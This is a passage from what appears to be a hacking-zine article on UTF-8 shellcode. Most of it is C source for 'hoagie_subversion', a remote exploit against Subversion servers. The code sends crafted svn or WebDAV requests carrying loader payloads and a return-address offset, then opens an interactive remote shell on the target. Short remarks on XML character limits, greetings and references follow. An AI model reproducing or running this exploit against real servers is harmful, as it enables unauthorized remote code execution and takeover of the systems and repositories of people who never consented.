      *ptr=0;
      snprintf(bfr,1000,"%s",uri);
      *port=(int)strtol(bfr,NULL,10);
      *ptr='/';
      uri=ptr;
   }
   else if((ptr=strchr(uri,'/')))
   {
      *ptr=0;
      snprintf(host,1000,"%s",uri);
      *ptr='/';
      uri=ptr;
   }
   snprintf(repos,1000,"%s",uri);
   return 0;
}

int exec_sh(int sockfd)
{
   char snd[4096],rcv[4096];
   fd_set rset;
   while(1)
   {
      FD_ZERO(&rset);
      FD_SET(fileno(stdin),&rset);
      FD_SET(sockfd,&rset);
      select(255,&rset,NULL,NULL,NULL);
      if(FD_ISSET(fileno(stdin),&rset))
      {
         memset(snd,0,sizeof(snd));
         fgets(snd,sizeof(snd),stdin);
         write(sockfd,snd,strlen(snd));
      }
      if(FD_ISSET(sockfd,&rset))
      {
         memset(rcv,0,sizeof(rcv));
         if(read(sockfd,rcv,sizeof(rcv))<=0)
            exit(0);
         fputs(rcv,stdout);
      }
   }
}

int main(int argc, char **argv)
{
   int sock, port;
   size_t size;
   char cmd[1000], reply[1000], buffer[1000];
   char svdcmdline[1000];
   char host[1000], repos[1000], *ptr, *caddr;
   unsigned long addr;
   struct sockaddr_in sin;
   struct hostent *he;
   enum protocol proto;

   /*sock=open("output",O_CREAT|O_TRUNC|O_RDWR,0666);
   write(sock,stage1loader,strlen(stage1loader));
   close(sock);
   return 0;*/

   printf("hoagie_subversion - remote exploit against subversion servers\n"
          "by greuff@void.at\n\n");
   if(argc!=3)
   {
      printf("Usage: %s serverurl offset\n\n",argv[0]);
      printf("Examples:\n"
             "   %s svn://localhost/repository 0x41414141\n"
             "   %s http://victim.com:6666/svn 0x40414336\n\n",argv[0],argv[0]);
      printf("The offset is an alphanumeric address (or UTF-8 to be\n"
             "more precise) of a pop instruction, followed by a ret.\n"
             "Brute force when in doubt.\n\n");
      printf("When exploiting against an svn://-url, you can supply a\n"
             "binary offset too.\n\n");
      exit(1);
   }

   // parse the URI
   snprintf(svdcmdline,sizeof(svdcmdline),"%s",argv[1]);
   if(parse_uri(argv[1],&proto,host,&port,repos)<0)
   {
      printf("URI parse error\n");
      exit(1);
   }
   printf("parse_uri result:\n"
          "Protocol: %d\n"
          "Host: %s\n"
          "Port: %d\n"
          "Repository: %s\n\n",proto,host,port,repos);
   addr=strtoul(argv[2],NULL,16);
   caddr=(char *)&addr;
   printf("Using offset 0x%02x%02x%02x%02x\n",caddr[3],caddr[2],caddr[1],caddr[0]);

   sock=socket(AF_INET,SOCK_STREAM,0);
   if(sock<0)
   {
      perror("socket");
      return -1;
   }

   he=gethostbyname(host);
   if(he==NULL)
   {
      herror("gethostbyname");
      return -1;
   }
   sin.sin_family=AF_INET;
   sin.sin_port=htons(port);
   memcpy(&sin.sin_addr.s_addr,he->h_addr,sizeof(he->h_addr));
   if(connect(sock,(struct sockaddr *)&sin,sizeof(sin))<0)
   {
      perror("connect");
      return -1;
   }

   if(proto==SVN)
   {
      size=read(sock,reply,sizeof(reply));
      reply[size]=0;
      printf("Server said: %s\n",reply);
      snprintf(cmd,sizeof(cmd),"( 2 ( edit-pipeline ) %d:%s ) ",strlen(svdcmdline),svdcmdline);
      write(sock,cmd,strlen(cmd));
      size=read(sock,reply,sizeof(reply));
      reply[size]=0;
      printf("Server said: %s\n",reply);
      strcpy(cmd,"( ANONYMOUS ( 0: ) ) ");
      write(sock,cmd,strlen(cmd));
      size=read(sock,reply,sizeof(reply));
      reply[size]=0;
      printf("Server said: %s\n",reply);
      snprintf(cmd,sizeof(cmd),"( get-dated-rev ( %d:%s%c%c%c%c ) ) ",strlen(stage1loader)+4,stage1loader,
            caddr[0],caddr[1],caddr[2],caddr[3]);
      write(sock,cmd,strlen(cmd));
      size=read(sock,reply,sizeof(reply));
      reply[size]=0;
      printf("Server said: %s\n",reply); 
   }
   else if(proto==HTTP)
   {
      // preparing the request...
      snprintf(buffer,sizeof(buffer),xmlreqfmt,stage1loader,
            caddr[0],caddr[1],caddr[2],caddr[3]);
      size=strlen(buffer);
      snprintf(cmd,sizeof(cmd),requestfmt,repos,host,size,buffer);

      // now sending the request, immediately followed by the 2nd stage loader
      printf("Sending:\n%s",cmd);
      write(sock,cmd,strlen(cmd));
      sleep(1);
      write(sock,stage2loader,stage2loaderlen);
   }

   // SHELL LOOP
   printf("Entering shell loop...\n");
   exec_sh(sock);

   /*sleep(1);
   close(sock);
   printf("\nConnecting to the shell...\n");
   exec_sh(connect_sh()); */
   return 0;
}
----------8<------------8<-------------8<------------8<---------------

----------------------------------------------------------------------------

---[ 6. Considerations

Some thoughts about the whole topic.

---[ 6.1. Automated shellcode transformer

Perhaps it's possible to write an automated shellcode transformer that
takes a shellcode and outputs a UTF-8 compatible version of it (similar
to rix's alphanumeric shellcode compiler [4]), but it would be a
challenge. Many decisions during the transformation process cannot be
automated in my opinion. (By the way - alphanumeric shellcode is of
course valid UTF-8! So if you want to save time and space it's not a
problem, just use the alphanumeric shellcode compiler on your shellcode
and use that!)

---[ 6.2. UTF-8 in XML-files

When you write UTF-8 shellcode for the purpose of sending it in an XML
document, you'll have to care for a few more things. XML 1.0 forbids
all control characters below \x20 except \x09, \x0a and \x0d (so \x00
to \x08, \x0b, \x0c and \x0e to \x1f are out), and markup characters
like '<' and '&' cannot appear literally. Don't forget that when you
exploit your favourite XML-processing app!
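
The character restrictions of XML 1.0 are small enough to write down as
a predicate on decoded code points. The sketch below follows the Char
production of the XML 1.0 recommendation; both function names are
invented for this example, and the second one only covers plain element
content (attribute values and CDATA sections have further rules).

```c
#include <stdint.h>

/* 1 if code point cp matches the Char production of XML 1.0:
 * #x9 | #xA | #xD | [#x20-#xD7FF] | [#xE000-#xFFFD] | [#x10000-#x10FFFF] */
int xml10_char_ok(uint32_t cp)
{
    return cp == 0x09 || cp == 0x0A || cp == 0x0D ||
           (cp >= 0x20 && cp <= 0xD7FF) ||
           (cp >= 0xE000 && cp <= 0xFFFD) ||
           (cp >= 0x10000 && cp <= 0x10FFFF);
}

/* 1 if cp may appear literally in element content, i.e. it is a legal
 * character and does not start markup or an entity reference */
int xml10_literal_ok(uint32_t cp)
{
    return xml10_char_ok(cp) && cp != '<' && cp != '&';
}
```

Note that the check works on code points, not bytes: a continuation byte
such as \x90 is never tested on its own, only the character that the
whole sequence decodes to.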
 
----------------------------------------------------------------------------

---[ 7. Greetings, last words

andi@void.at (man, get a nick :))
soletario (the indoor snowboarder)
ReAction
all the other people who often helped me out

----------------------------------------------------------------------------

[1] http://www.cl.cam.ac.uk/~mgk25/unicode.html
[2] http://www.unicode.org/versions/corrigendum1.html
[3] http://www.x86.org/secrets/opcodes/salc.htm
[4] http://www.phrack.org/show.php?p=57&a=15

|=[ EOF ]=---------------------------------------------------------------=|